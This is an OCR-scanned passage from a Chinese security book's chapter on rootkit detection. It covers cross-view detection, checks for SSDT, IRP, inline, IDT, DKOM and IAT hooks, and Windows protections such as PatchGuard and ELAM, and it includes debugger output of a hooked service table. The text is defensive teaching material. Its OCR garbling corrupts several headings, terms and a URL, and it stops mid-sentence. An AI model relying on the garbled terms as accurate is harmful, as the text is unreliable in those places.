系统 或 者 应 用 程序 ， 那 么 应 该 也 就 能 对 试图 发 现 它 的 任何 程序 保持 隐蔽 。 


举 个 例子 ， 大 部 分 的 内 核 Rookit 应 该 能 够 阻止 每 一 种 操作 于 用 户 空间 的 Rootkit 检 测 技术 正常 工作 ， 因 为 内 核 控制 着 传递 到 
用 户 空间 的 数据 。 如 果 Rootkit 检 测 程序 作为 常规 的 用 户 应 用 程序 而 试图 扫描 内 存 ， 在 内 核 中 运行 的 Rootkit 能 够 发 现 这 一 情况 并 
且 提 供 庶 假 的 内 存 让 其 分 析 (例如 ， 告 诉 Rootkit 检 测 程序 “没有 人 在 家 ”) 。 这 一 点 看 上 去 容易 ， 但 是 实际 上 对 于 Rootkit 作 者 
来 说 ， 实 施 反 Rootkit 检 测 功能 比 编写 Rootkit 本 身 要 难得 多 。 缺 乏 可 用 的 源 代码 、Rootkit 检 测 工具 的 数量 以 及 时 间 都 是 使 反 
Rootkit 检 测 功能 很 少 出 现 的 因素 。 实 现 反 Rootkit 检 测 功能 如 此 复杂 和 困难 这 一 事实 有 利于 好 人 一 一 白 帽 一 一 因为 大 部 分 时 候 
我 们 能 够 赢得 这 一 战役 ， 检 测 并 且 删 除 Rootkit。 


10.1 Rootkit 作 者 的 悖 论 


Rootkit 有 趣 的 一 点 是 ， 从 天 性 上 讲 ， 它 们 是 自 相 了 矛盾 的 。 Rootkit 作 者 对 自己 编写 的 每 个 Rootkit 都 有 两 个 核心 需求 : 
< Rootkit 必 须 保 持 隐藏 。 
.Rootkit 必须 运行 在 它 所 感染 的 主机 相同 的 物理 资源 之 上 ; 换 旬 话说 ， 主 机 必须 执行 这 个 Rootkit。 


这 两 个 需求 形成 了 矛盾 。 如 果 OS 或 者 进程 /机 器 (在 虚拟 Rootkit 的 情况 下 ) 必须 知道 Rootkit 的 情况 才能 执行 它 ， 那 么 
Rootkit eA (HSS? 答案 是 : _ Rootkit 在 大 部 分 情况 下 无 法 保持 隐蔽 。 


你 必须 记 住 ，Rootkit 检 测 和 所 有 恶意 软件 检测 类 似 ， 是 一 种 军备 竞赛 ， 这 种 竞赛 由 政 我 双方 的 需要 推进 。 当 新 的 Rootkit 技 
术 得 到 采用 时 ， 来 自 不 同安 全 供应 商 的 研究 人 员 提 出 解决 方案 ， 以 揭示 Rootkit 隐 藏 的 恶意 软件 。 为 了 在 军备 竞赛 中 先 人 一 步 ， 
研究 人 员 没有 等 待 下 一 代 Rootkit 技 术 的 出 现 ， 而 是 自行 找 出 扎根 于 系统 的 方法 ， 并 设计 出 解决 方案 。 这 可 以 归 入 超前 的 项 目 
中 ， 在 这 些 项 目 中 ， 研 究 人 员 分析 硬 件 和 软件 中 的 新 技术 以 及 进展 ， 找 出 Rootkit 可 能 利用 的 漏洞 。 


10.2 “Rootkit 检测 简 史 


在 每 个 军备 竞赛 中 ， 知 道 你 曾经 的 足迹 ， 以 此 来 理解 将 来 的 去 向 是 很 重要 的 ， 所 以 介绍 一 下 Rootkit 检 测 的 简 史 是 合理 的 。 
寻找 Rootkit 的 第 一 次 尝试 不 包括 检测 ， 而 是 预防 。 防 Rootkit 技 术 关注 于 阻止 恶意 的 内 核 驱 动 程序 或 者 用 户 空间 应 用 程序 执行 或 
者 被 操作 系统 装 入 。 当 然 ， 在 Rootkit 作 者 开始 分 析 应 用 程序 阻止 Rootkit 装 入 的 方法 并 且 开 发 出 新 的 装 入 方法 之 前 ， 这 种 方法 是 
有 效 的 。 


例如 ， 完 整 性 保护 驱动 程序 (Integrity Protection Driver, IPD) 阻止 内 核 模式 Rootkit 通 过 挂钩 系统 服务 调度 表 (SSDT) 
中 的 函数 NtOpenSection 和 NtLoadDriver 装 入 ， 并 且 确 保 只 有 预先 确定 的 驱动 程序 能 够 调用 这 些 函 数 。 如 果 不 在 预先 确定 列表 
中 的 Rootkit 试 图 装 入 ， 将 被 阻止 。 


这 种 方法 有 两 个 固有 的 问题 。 首 先 ， 它 依赖 “清晰 ”或 者 “纯净 ”的 基线 来 建立 预先 确定 的 允许 启动 程序 列表 。 其 
次 ，Rootkit 开 发 者 如 Greg Hoglund 发 现 了 使 用 ZwSetSystem-lnformation 装 入 驱动 程序 绕 开 IPD 的 方法 。1IPD 作 者 立即 更 新 了 
他 们 的 工具 ， 但 是 许多 新 的 绕 开 IPD 的 方法 持续 发 布 ， 现 在 ， 这 个 工具 已 经 相对 没有 效果 了 。 


IPD 用 于 阻止 未 知 或 者 未 许可 软件 装 入 的 方法 是 采用 许多 个 人 防火 墙 公司 使 用 的 白 名 单 技术 。 白 名 单 技术 的 所 有 问题 在 IPD 
和 类 似 IPD 的 应 用 程序 中 也 很 明显 。 白 名 单方 法 的 一 个 主要 问题 是 ， 检 测 应 用 程序 必须 挂钩 或 者 分 析 未 知 的 内 核 驱动 程序 (也 就 
Rootkit) 用 于 装 入 的 所 有 可 能 入 口 点 。 最 新 版 本 的 IPD 具 有 超过 8 个 不 同 的 入 口 点 ， 还 不 包括 这 8 个 入 口 点 所 连接 的 用 例 。 例 
如 ， 注 册 表 可 用 于 装 入 基于 内 核 的 Rootkit。 但 是 ， 注 册 表 使 用 符号 链接 ， 一 个 名 称 实际 上 引用 另 一 个 名 称 ， 以 此 来 启用 某 个 功 
能 ; 这 意味 着 白 名 单 应 用 程序 必须 知道 注册 表 中 的 HKEY_LOCAL_MACHINE 和 内 核 中 的 名 称 不 相同 。 内 核 将 接受 
\RegistrAMACHINE。 需 要 监控 的 位 置 数量 是 可 能 的 注册 表 / 文 件 系统 符号 链接 数量 乘 以 入 口 点 数量 ， 由 此 你 可 以 看 到 对 于 一 个 
防 Rootkit 开 发 人 员 来 说 这 是 多 么 令 人 畏缩 的 任务 ! 


之 后 出 现 的 一 种 新 型 白 名单 和 现 有 技术 有 相同 的 问题 ， 但 是 要 精确 得 多 ， 这 就 是 加 密 签 名 。 在 这 种 技术 中 ， 内 核 被 要 求 执行 
一 个 进程 ， 但 是 在 执行 之 前 ， 内 核 使 用 一 个 秘 钥 凭 证 验证 进程 中 的 唯一 秘 钥 正 确 。 和 你 的 Web 浏 览 器 中 的 SSL 加 密 相似 ， 这 种 技 
术 实 际 上 不 允许 任何 未 知 的 应 用 程序 访问 计算 机 硬件 ， 从 而 使 恶意 软件 甚至 不 能 运行 ! 


因为 白 名 单方 法 非常 费时 ， 开 发 人 员 转 向 可 靠 的 方法 一 一 基于 特征 码 的 检测 。 许 多 最 早 公开 的 Rootkit， 甚 至 过 去 10 年 来 常 
见 的 Rootkit 都 很 容易 通过 特征 码 检测 。 基 于 特征 码 的 检测 过 程 是 : 应 用 程序 人 存储 一 个 字 节 数据 库 、 字 节 串 以 及 字 节 组 合 ， 当 在 
一 个 二 进 制 文件 中 发 现 这 些 时 ， 就 将 二 进 制 文件 标记 为 恶意 的 。 例 如 ， 如 果 二 进 制 文件 的 第 1145 字 节 包 合十 六 进 制 串 
0xDEADBEEF， 那 么 这 个 二 进 制 文件 可 能 被 看 成 恶意 的 。 昌 然 这 种 方法 很 简单 ， 但 是 在 许多 年 里 都 是 主要 的 防 病毒 和 防 Rootkit 
的 检测 方法 。 有 了 这 些 信息 ， 通 过 特征 码 识别 就 Rootkit 很 简单 。 而 头 几 个 特征 码 系统 是 依赖 文件 系统 中 的 文件 特征 码 匹配 的 防 
病毒 技术 的 扩展 ， 新 技术 使 用 内 存 特 征 码 来 识别 在 系统 上 执行 的 恶意 代码 。 这 一 过 程 对 于 公开 的 Rootkit 相 当 有 效 ， 因 为 分 析 人 
员 可 以 获得 这 些 Rootkit 的 二 进 制 代码 ， 以 此 来 建立 可 供 评估 的 特征 码 。 私 有 、 定 制 的 Rootkit 将 不 会 被 基于 特征 码 的 系统 发 现 。 


在 基于 特征 码 的 系统 开始 被 绕 过 时 ， 一 组 新 的 方法 开发 出 来 。 这 组 方法 常常 被 称 作 交 叉 视 图 (cross-view) 或 者 污染 视 
(tainted view) ， 目 前 大 多 数 Rootkit 检 测 应 用 程序 都 使 用 这 种 新 技术 。 污 染 视图 方法 比较 系统 的 不 同 快照 ， 例 如 运行 中 的 
进程 类 型 、 机 器 上 安装 的 硬件 或 者 执行 特定 系统 任务 所 需要 的 函数 名 称 和 数量 ， 并 且 发 现 这 些 快照 产生 差异 的 地 方 。 这 种 方法 的 
前 提 是 一 种 方式 执行 的 数据 视图 应 该 与 系统 上 存在 Rootkit 时 的 不 同 执行 方式 的 数据 视图 不 同 。 用 户 所 看 到 的 视图 被 认为 是 受 污 
染 的 视图 (tainted view) ， 而 硬件 所 看 到 的 视图 被 认为 是 干净 视图 或 者 可 信 的 视图 。 例 如 ，Rootkit 检 测 程序 根据 用 户 空间 API 
取得 一 个 当前 运行 的 进程 快照 ; 这 是 一 个 受 污染 视图 。 然 后 检测 程序 根据 内 核 中 控制 进程 执行 的 内 部 线程 结构 取得 一 个 运行 进程 
的 快照 ; 这 是 一 个 干净 的 视图 。 接 下 来 ，Rootkit 检 测 程序 比较 这 两 个 快照 ， 生 成 一 个 在 干净 视图 中 却 未 在 污染 视图 中 出 现 的 进 
程 列表 。 这 些 进 程 被 认为 是 隐藏 的 ， 因 此 它们 是 恶意 的 ， 应 该 受到 Rootkit 检 测 程序 操作 者 的 调查 。 图 10-1 说 明了 这 种 比较 。 
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污染 视图 


smss.exe PID: 1388 
csrss.exe PID: 1468 
winlogon.exe PID: 1504 
services.exe PID: 1548 
svchost.exe PID: 1744 
ati2evxx.exe PID: 1776 
svchost.exe PID: 1792 
asghost.exe PID: 3648 
wmiprvse.exe PID: 2592 
svchost.exe PID: 1900 
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进程 名 称 : 
进程 名 称 : 
进程 名 称 : 
进程 名 称 : 
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干净 视图 

smss.exe PID: 1388 
csrss.exe PID: 1468 
winlogon.exe PID: 1504 
services.exe PID: 1548 
malware.exe PID: 1614 
svchost.exe PID: 1744 
ati2evxx.exe PID: 1776 
svchost.exe PID: 1792 
asghost.exe PID: 3648 


wmiprvse.exe PID: 2592 
svchost.exe PID: 1900 





进程 名 称 : malware.exe PID: 1614 


差异 





图 10-1 人 受 污染 视图 与 干净 视图 的 比较 


不 管 是 比较 文件 、 进 程 、 注 册 表 键 值 、 内 存 中 的 结构 ， 甚 至 操作 系统 内 部 使 用 的 内 存 区 域 ， 污 染 视 图 方法 都 有 效 。 当 这 种 方 
法 刚刚 开发 出 来 时 ， 它 是 非常 强大 的 并 且 发 现 了 许多 Rootkit。 几 乎 所 有 目前 可 用 的 Rootkit 检 测 程 序 都 采用 污染 视图 方法 作为 发 
现 Rootkit 的 主要 方法 。 各 种 Rootkit 检 测 程序 之 间 的 不 同 是 ， 用 于 实现 干净 视图 的 方法 以 及 检测 程序 用 于 确保 干净 视图 或 者 检测 
程序 本 身 不 会 遭 到 自 改 的 步 又。 我们 称 这 种 方法 为 污染 视图 方法 ， 而 有 人 称 之 为 交叉 视力 或 者 干净 / 非 干 兆 视 图 (clean/un- 
clean view) 方法 ,无 论 如 何 , 方法 都 一 样 。 


然而 ， 污 染 视 图 方法 也 有 一 些 Rootkit 可 以 利用 的 缺陷 。 污 染 视图 概念 是 根据 以 下 假设 进行 工作 的 : 低级 的 干净 视图 将 会 报 
告 不 同 的 数据 ， 以 及 Rootkit 不 能 控制 产生 干净 视图 的 技术 性 进程 返回 的 数据 。 从 第 4 章 和 第 5 章 中 ， 你 可 以 了 解 到 高 级 的 
Rootkit， 例 如 内 核 Rootkit 和 虚拟 Rootkit， 实 际 上 控制 了 除 系统 中 处 理事 件 的 实际 安排 之 外 的 一 切 ， 并 且 能 够 向 用 户 模式 的 应 
用 程序 返回 任何 类 型 的 数据 。 


前 面 已 经 讨论 过 ， 有 许多 方法 在 内 核 或 者 用 户 模式 中 与 Rootkit 挂 钩 。 下 面 是 一 些 我 们 讨论 过 的 方法 : 
* 系统 管理 程序 

. 系统 服务 调度 表 (SSDT) 

KA AF (detours) 

“ [I/O 请求 包 (IRP) 处 理 程序 


. 系统 自 举 装 入 程序 


上 述 每 种 技术 都 有 各 种 问题 ， 使 得 实施 污染 视图 检测 方法 时 难 易 各 异 。 


首先 采取 污染 视图 方法 的 Rootkit 检 测 工具 之 一 是 Joanna Rutkowska 开 发 的 Patchfinder。Patchfinder 假 定 大 部 分 Rootkit 
必须 扩展 或 者 修改 一 个 执行 路 径 以 达到 它们 的 目标 。 比 如 ， 操 作 系统 为 打开 文件 所 执行 的 标准 函数 是 kernel32.OpenFile () ， 
然后 是 ntdll.NtOpenFile () ， 接 着 切换 到 内 核 函 数 ZwOpenFile。Patchfinder 首 先 统计 执行 这 一 操作 需要 的 指令 数量 ， 然 后 试 
图 检测 内 核 驱 动 程序 中 特定 消 数 执行 路 径 中 的 变化 ， 因 为 指令 数量 的 增加 是 Rootkit 安 装 在 系统 上 的 一 个 很 好 的 标志 。 


回 到 我 们 的 例子 ， 如 果 kernel32.OpenFile () 有 钩 子 ，Rootkit 添 加 了 128 个 字 节 的 指令 ， 那 么 Patchfinder 会 发 现 执行 
径 的 大 小 不 同 ， 并 且 发 出 机 器 可 能 受到 侵害 的 警告 。Patchfinder 在 系统 自 举 时 对 所 有 内 存 中 的 内 核 驱 动 程序 进行 基准 测试 ， 计 
算 每 个 驱动 程序 具体 执行 路 径 中 包含 的 指令 数 ; 这 常 被 称 为 执行 路 径 分 析 。Patchfinder 使 用 CPU 中 的 调试 寄存 器 查看 每 条 执行 
的 指令 来 进行 这 一 分 析 。 这 种 调试 技术 常常 称 为 单 步 (single step) ， 常 用 于 开发 人 员 测 试 软件 。Patchfinder 接 着 定时 地 重新 
扫描 系统 ， 比 较 基准 测试 时 记录 的 指令 数量 和 最 后 扫描 得 到 的 数字 。 这 种 方法 工作 得 相当 不 错 ， 但 是 因为 Windows 是 一 个 动态 
的 可 以 通过 使 用 文件 系统 过 滤器 驱动 程序 和 网 络 驱动 程序 (如 防火 墙 ) 扩展 的 操作 系统 ， 也 可 能 出 现 未 安装 Rootkit 而 执行 路 径 
变化 的 合理 情况 。 为 了 应 对 这 种 情况 ，Patchfin der 使 用 统计 来 确定 额外 的 指令 是 否 合理 。 统 计 方 法 是 有 效 的 ， 但 仍然 有 假 阳 
性 ,而 且 有 些 Rootkit 能 够 轻易 地 击败 Patchfinder， 当 这 些 Rootkit 被 跟踪 或 者 处 于 “ 单 步 调试 ”状态 时 ， 能 检测 到 一 个 开发 人 
员 用 于 走 查 程序 或 者 驱动 程序 执行 的 每 条 指令 的 进程 。 


10.3 ”检测 方法 详解 


在 我 们 研究 可 用 于 检测 Rootkit 的 工具 和 应 用 程序 之 前 ， 和 希望 花费 一 些 时 间 解 剖 各 种 工具 如 何 实现 污染 视图 检测 ， 以 对 抗 
Rootkit 开 发 人 员 的 许多 钩子 方法 。 为 了 学 习 如 何 使 用 这 些 检测 方法 编写 自己 的 Rootkit 检 测 程序 ， 可 以 参见 附录 ， 我 们 在 那里 为 
大 家 说 明了 开发 自己 的 Rootkit 工 具 的 整个 过 程 。 在 本 章 中 ,我们 有 意 地 保持 最 少 的 编程 代码 ， 以 便 阐述 概念 ， 而 不 仅仅 是 用 源 
代码 填 满 整个 页 面 。 如 果 你 希望 直接 研究 源 代码 ， 阅 读本 节 后 再 参看 附录 。 


10.3.1 系统 服务 描述 符 表 钩子 


最 简单 和 最 常用 的 技术 之 一 一 一 系统 服务 描述 符 表 (SSDT) 钩子 ， 很 容易 发 现 ， 几 乎 每 种 工具 都 能 检测 SSDT 钩 子 。 在 第 4 
章 中 ， 我 们 讨论 了 ssDT 钩 子 的 工作 原理 ， 并 且 提 到 了 SSsDT 钧 子 成 为 最 常用 的 方法 只 是 因为 容易 实现 。Windows 内 核 维持 一 张 
输出 给 驱动 程序 使 用 的 所 有 函数 的 表格 。 Rootkit 作 者 只 需要 找到 这 张 表 以 及 GUI 子 系统 所 使 用 的 影子 版 本 ， 某 换 表 格 中 的 指向 
内 核 函数 实际 位 置 的 指针 为 Rootkit 的 内 核 函 数 版 本 。KiServiceTable 存 储 该 表格 中 的 所 有 内 核 函数 的 地 址 。 例 如 ， 如 果 你 使 用 
WinDBG 查 看 正常 的 KiServiceTable 的 结构 ， 就 会 注意 到 一 个 趋势 : 


kd> dps nt!kiServiceTable Lllic 


804e2dac 8056b553 nt!NtCreateEvent 
804e2db0 80647bac nt!NtCreateEvent Pair 
804e2db4 8057164c nt!NtCreateFile 
804e2db8 80597eed nt!NtCreateIoCompletion 
804e2dbc 805ad39a nt!NtCreateJobObject 


你 可 以 看 到 所 有 函数 普遍 处 于 0x80000000 的 范围 。 现 在 ， 看 看 安装 一 个 使 用 SSDT 钩 子 的 Rootkit 后 会 发 生 什 么 : 


kd> dps nt!kiServiceTable Lilc 


804e2dac 8056b553 nt!NtCreateEvent 
804e2db0 80647bac nt!NtCreateEventPair 
804e2db4 £985b710 rootkit+0x8710 

804e2db8 80597eed nt!NtCreateIoCompletion 
804e2dbc 805ad39a nt!NtCreateJobObject 


你 可 以 看 到 原来 位 于 0x8057164c 地 址 的 nt! NtCreateFile 已 经 被 具有 调试 程序 无 法 解析 的 新 地 址 的 一 个 函数 所 替代 。 新 地 
址 是 0xf985b710， 这 是 十 进 制 4186289936 的 十 六 进 制 记 法 。 这 个 地 址 绝对 不 会 落 在 0 到 0x80000000 (2147483648) 范围 内 。 


大 部 分 挂钩 SSDT 的 程序 都 使 用 这 一 简单 的 逻辑 ， 寻 找 该 表 中 正确 地 映射 到 ntoskrnl.exe 找 到 的 地 址 的 最 低 和 最 高 指针 值 ， 
如 果 该 表 中 的 一 个 函数 指针 地 址 落 到 这 个 范围 之 外 ， 你 就 得 到 了 该 函数 带 有 钩子 的 一 个 很 好 的 指示 。 


10.3.2 IRPF 


检测 IRP 钩 子 的 方法 和 检测 SSDT 钩 子 相同 。 每 个 驱动 程序 输出 一 组 28 个 处 理 MO 请 求 包 的 函数 指针 。 这 些 函 数 人 存储 在 驱动 程 
序 的 DRIVER_OBJECT 中 ， 而 每 个 函数 指针 都 可 以 被 另 一 个 指针 蔡 代 。 正 如 你 所 能 猜 到 的 ， 这 意味 着 DRIVER_OBJECT 所 起 的 作 
用 和 KiserviceTable 非 常 相似 。 如 果 你 扫描 DRIVER_OBJECT 并 且 比 较 每 个 函数 指针 地 址 ， 了 解 该 地 址 是 否 落 在 驱动 程序 地 址 范 
围 之 内 ， 就 能 确定 函数 指针 是 否 与 特定 的 IRP 挂 钧 。 


10.3.3 RAF 


EBRAHIF (inline hooking) 或 称 为 detours， 是 用 其 他 指令 取代 函数 头 几 个 导致 跳 转 到 Rootkit 函 数 的 过 程 。 这 种 方法 比 蔡 
换 函 数 指针 地 址 更 可 取 ， 因 为 你 可 以 看 到 后 者 多 么 容易 被 发 现 。 尽 管 这 种 方法 更 好 ， 但 是 这 种 钩子 不 总 是 很 容易 做 到 ， 有 时 甚至 
不 可 能 。 然 而 ， 检 测 函数 是 否 被 绕 过 和 检测 SSDT 钩 子 的 过 程 相 同 。 


防 Rootkit 工 具 将 装 入 一 个 包含 可 能 被 挂钩 的 函数 的 二 进 制程 序 ， 并 且 存 储 该 函数 的 指令 。 一 些 Rootkit 检 测 防护 工具 将 仅仅 


分 析 头 几 个 字 节 ， 以 加 快速 度 。 一 旦 存储 了 真实 函数 的 指令 ， 装 入 内 人 存 的 指令 与 真实 的 函数 指令 进行 比较 。 如 果 两 者 之 间 有 任何 
不 同 ， 就 表示 该 函数 可 能 被 绕 过 。 


10.3.4 中断 描述 符 表 钩子 


中 断 描述 符 表 (Interrupt Descriptor Table, IDT) 的 挂钩 和 SSDT 及 IRP 钩 子 方法 相同 。 这 个 表格 有 一 组 每 个 中 断 的 函数 指 
针 。 为 了 挂钩 中 断 ，Rootkit 用 自己 的 函数 替换 中 断 。 


10.3.5 ”直接 内 核对 象 操纵 


直接 内 核对 象 操纵 (Direct Kernel Object Manipulation, DKOM) 是 独特 的 钩子 方法 ， 因 为 作者 操纵 内 核 中 可 能 在 
Microsoft 发 行 的 不 同 服务 包 甚 至 补丁 之 间 可 能 改变 的 对 象 。 检 测 修 改过 的 内 核对 象 要 求 对 检测 对 象 类 型 的 理解 。 例 如 ，Rootkit 
将 频繁 使 用 DKOM ， 通 过 调整 EPROCESS 结 构 将 希望 隐藏 的 进程 从 列表 中 删除 ， 从 而 隐藏 进程 。 


为 了 检测 使 用 DKOM 隐 藏 的 进程 ， 你 必须 查看 所 需 信息 可 能 存储 的 其 他 位 置 。 例 如 ， 操 作 系统 通常 有 超过 一 个 仓储 信息 
(例如 进程 、 线 程 等 ) 的 位 置 ， 因 为 操作 系统 的 许多 不 同 部 分 需要 这 些 信息 。 因 此 ， 如 果 Rootkit 作 者 仅仅 从 EPROCESS 列 表 中 
删除 进程 ， 防 Rootkit 作 者 就 可 以 检查 PspCidTable 并 且 比 较 两 个 列表 的 进程 ID， 寻 找 不 同 之 处 。 


10.3.6 IAT 


钩子 不 仅 发 生 在 内 核 模式 。 用 户 模式 钩子 常常 出 现 并 且 很 容易 实现 。 更 加 著名 的 一 个 用 户 钩子 是 IAT 钩 子 。1IAT 钩 子 检测 很 
简单 。 首 先 ，Rootkit 检 测 程序 找到 进程 需要 的 DLL 列 表 。 对 每 个 DLL， 检 测 程序 都 装 入 DLL， 分析 输入 的 函数 ， 并 且 存 储 这 些 
DLL 函数 的 输入 地 址 。 然 后 ，Rootkit 检 测 程序 比较 地 址 列表 和 被 检查 进程 中 所 有 DLL 使 用 的 输入 地 址 。 如 果 检 测 程序 发 现 两 者 之 
间 有 任何 差异 ， 就 表明 输入 的 函数 可 能 带 有 钩子 。 


10.3.7 ”传统 DOsS 或 者 直接 磁盘 访问 钩子 


另 一 种 检测 方法 以 汇编 指令 使 用 传统 DO3 或 者 直接 磁盘 访问 。 概 念 很 简单 : 假定 现代 Rootkit 操 纵 现 代 结 构 以 建立 钩子 隐藏 
自己 。 因 此 ， 使 用 | 日 方法 读 取 文件 ， 就 可 以 确定 某 些 文件 是 否 被 隐藏 。 例 如 ， 大 部 分 Rootkit 搭 配 一 些 文件 以 便 在 重启 时 保存 其 
代码 。 这 种 检测 方法 的 假设 成 立 一 一 存在 一 个 文件 ， 作 为 Rootkit 主 代码 或 者 主 代码 的 一 部 分 。 使 用 与 硬盘 读 取 相 关 的 INT13 中 
断 ， 检 测 技术 可 以 列 出 目录 结构 ， 与 确定 目录 结构 的 现代 方法 (Windows API) 比较 ， 可 能 发 现 差 别 。 如 果 确 定 文件 被 隐藏 ， 
这 种 方法 就 可 以 用 特征 码 扫描 ,或 者 通知 用 户 可 能 存在 “潜在 Rootkit”。 


补救 方法 通常 包括 移动 或 者 使 隐 含 文件 失效 ， 然 后 重启 。 重 启 之 后 ，Rootkit 不 再 能 保护 相关 的 文件 ， 使 其 落 入 基于 特征 码 
扫描 程序 的 掌握 之 中 ， 连 同 相关 注册 项 一 起 被 删除 。 


10.4 Windows 防 Rootkit 特 性 


Windows 确 实 有 其 缺陷 ， 但 是 所 幸 的 是 ， 从 Windows XP Service Pack3、Vista 到 最 新 Windows10，Microsoft 在 操作 系 
统 的 安全 和 稳固 上 投入 了 许多 资源 。 实 际 上 ，Microsoft 甚 至 拥有 http://blogs.msdn.comysi team/ 上 的 一 个 系统 完整 性 团队 博 
客 。2005 年 ，Microsoft 发 布 了 一 套 新 的 技术 ， 从 SDL 开 始 ， 持 续 到 今天 的 Microsoft Edge， 支 持 更 先进 的 系统 完整 性 。 这 些 技 


- 安全 开发 生命 期 (Secure Development Lifecycle, SDL) Windows Vista 是 Microsoft 发 行 的 第 一 个 使 用 SDL 的 操作 系 


统 ，SDL 实 际 上 是 对 Mictosoft 的 软件 工程 过 程 的 一 个 修改 ， 组 合 了 必需 的 安全 过 程 。 


- Windows 服 务 加 固 (Windows service hardening) ”Microsoft 声 称 使 用 受 限 的 特权 运行 更 多 核心 服务 ， 所 以 如 果 恶 意 
软件 或 者 Rootkit 接 管 这 个 服务 ， 操 作 系 统 将 会 阻止 特权 的 提升 。 


- No-execute (NX) 和 地 址 空间 随机 分 配 (Address Space Layout Randomization, ASLR) ”这 两 种 技术 的 加 入 主要 
是 帮助 预防 缓冲 区 溢出 一 一 这 是 Rootkit 有 时 使 用 的 一 种 攻击 技术 。 


- 内 核 修 补 保护 (Kernel Patch Protection, KPP) 更 常 被 称 为 PatchGuard， 阻 止 程序 修改 内 核 或 者 内 核 数据 结构 ， 例 如 
SSDT 和 IDT。 这 种 开发 是 对 Rootkit 作 者 的 重大 打击 ， 而 对 防 病毒 供应 商 也 一 样 。KPP 仅 实施 于 64 位 系统 。 


. 强制 驱动 程序 签名 在 64 位 系统 上 ， 所 有 内 核 模 式 驱 动 程序 必须 有 得 到 认可 的 机 构 的 数字 签名 ， 否 则 将 不 会 被 内 核 装 入 。 


- BitLocker 驱 动 程序 加 密 “” 主要 考虑 全 磁盘 加 密 解决 方案 ，Mictosoft 还 将 其 看 作 整 体系 统 完整 性 的 一 个 部 分 ， 因 为 它 拥有 
与 硬件 TPM 中 存储 的 一 个 可 信 密 钥 通 信 的 操作 方式 。 


- Authenticode Microsoft 引 入 这 个 应 用 程序 签名 服务 ， 人 允许 供 应 商 签署 其 应 用 程序 ， 这 样 内 核 可 以 在 运行 时 检查 所 提供 
的 hash， 确 保 与 Authenticode 签 名 匹配 。 


. 用 户 账户 控制 (User Account Control, UAC) ”这 种 技术 为 常规 用 户 应 用 业界 的 最 佳 实践 ， 例 如 最 少 特权 和 受 限 角 
色 。 


软件 限制 策略 ”这 个 术语 对 于 企业 中 通过 组 策略 进行 的 软件 控制 来 说 是 很 精巧 的 。 简 单 地 说 ， 如 果 在 组 策略 中 ， 管 理 员 不 
许可 在 系统 上 安装 软件 的 某 个 部 分 ， 该 软件 就 不 会 被 安装 。 


. Microsoft 恶 意 软 件 删除 工具 (Microsoft Malicions Software Removal Tool, MSRT) ”这 是 Microsoft 的 防 恶 意 软 件 产 


品 ， 使 用 传统 的 特征 码 检测 技术 。 


- Microsoft Edge: Microsoft Windows10 中 推出 的 Internet Explorer 新 版 本 。 它 提升 了 包含 在 Internet Explorer 最 新 版 本 中 的 所 
有 安全 特性 ， 并 提供 了 新 特性 。 


Microsoft 引 入 这 些 技术 是 其 历史 上 的 一 个 里 程 碑 ， 因 为 它们 代表 着 对 直接 处 理 Rootkit、 有 恶意 软件 以 及 操作 系统 安全 的 第 一 
次 重大 的 资源 和 市 场 投入 。 


Windows7、8 和 10 使 用 了 额外 的 方法 提高 系统 安全 性 。 例 如 ， 从 Windows10 开 始 ，User Protection Always- 
ON (UPAO) 作为 Windows 安 全 中 心 (WSC) 的 一 部 分 ,现在 要 求 系统 同时 启用 防 病毒 、 防 间谍 软件 和 防火 墙 ， 如 果 不 存 在 
类 似 的 保护 措施 ，WSC 将 自动 启动 Microsoft Defender 和 Windows 防 火 墙 。Microsoft 在 Windows8 中 推出 的 另 一 项 功能 是 
ELAM 一 一 Early Launch Anti-malware (早期 启动 防 恶意 软件 功能 ) ， 符 合 某 些 条 件 的 防 病毒 供应 商 可 以 使 用 这 一 功能 ， 在 任 
何 核心 元 素 (包括 Rootkit) 之 前 加 载 扫 描 程 序 ， 进 行 扫描 。 


10.5 ”基于 软件 的 Rootkit 检 测 


现在 互联 网 上 有 许多 防 Rootkit 应 用 程序 。 所 有 的 主流 商业 防 病毒 供应 商都 将 防 Rootkit 集 成 到 他 们 的 工具 中 或 者 免费 提供 。 
当 防 Rootkit 应 用 程序 刚刚 发 行 时 ， 它 们 最 关注 概念 验证 性 的 思路 来 帮助 解决 检测 的 问题 。 例 如 ，VICE 是 一 个 通过 解析 内 核 
SSDT 或 者 用 户 模式 中 的 函数 指针 并 且 确 认 它 们 指向 正确 的 应 用 程序 来 检测 钩子 的 免费 工具 。 例 如 ， 如 果 从 SSDT 中 解析 的 地 址 指 
向 test.sys， 而 应 该 指向 的 是 ntoskrnl.exe， 那 么 可 能 是 因为 Rootkit 挂 钧 了 这 个 函数 。 如 何 知道 SSDT 中 的 具体 项 目 是 否 指向 
ntoskrnl.exe? 你 只 要 枚 举 注册 到 OS 的 驱动 程序 列表 ， 并 且 将 SSDT 中 的 函数 指针 地 址 与 驱动 程序 的 基地 址 和 结束 地 址 比较 即 
可 。 如 果 SSDT 中 的 值 在 驱动 程序 的 地 址 范围 之 内 ， 那 么 它 位 于 驱动 程序 之 中 。 如 果 你 没有 找到 那个 地 址 的 驱动 程序 ， 那 么 可 能 


就 是 一 个 Rootkit。 


当 VICE 第 一 次 发 布 时 ， 它 是 独一无二 的 ， 因 为 它 实现 了 一 种 人 们 前 所 未 见 的 新 技术 ; 它 检 测 用 户 模式 和 内 核 模式 钩子 并 且 
能 够 发 现 常规 的 IAT 钧 子 、 谋 入 函数 钩子 和 SSDT 钧 子 ; 但 是 ，VICE 很 复杂 ， 不 是 很 友好 并 且 不 能 清除 所 发 现 的 Rootkit。 本 小 节 
中 讨论 的 大 部 分 应 用 程序 都 与 VICE 相 似 。 目 前 达到 最 终 用 户 能 够 有 效 利用 的 水 平 的 工具 非常 少 。 


许多 工具 仍然 非常 难以 理解 ， 造 成 许多 假 阳 性 ， 不 能 正确 地 清除 或 者 隔离 ， 这 些 都 使 最 终 用 户 更 加 痛苦 。 基 于 软件 的 
Rootkit 检 测 程序 与 其 他 检测 程序 一 起 使 用 并 且 具 有 某 些 方向 时 是 有 益 的 。 例 如 ， 一 个 工具 能 检测 某 些 其 他 工具 不 能 检测 的 
Rootkit， 或 者 一 个 工具 可 能 部 分 地 删除 一 个 项 目 ， 而 另 一 个 工具 能 够 删除 更 多 的 文件 或 者 注册 表 键 值 从 而 更 加 彻底 地 删除 
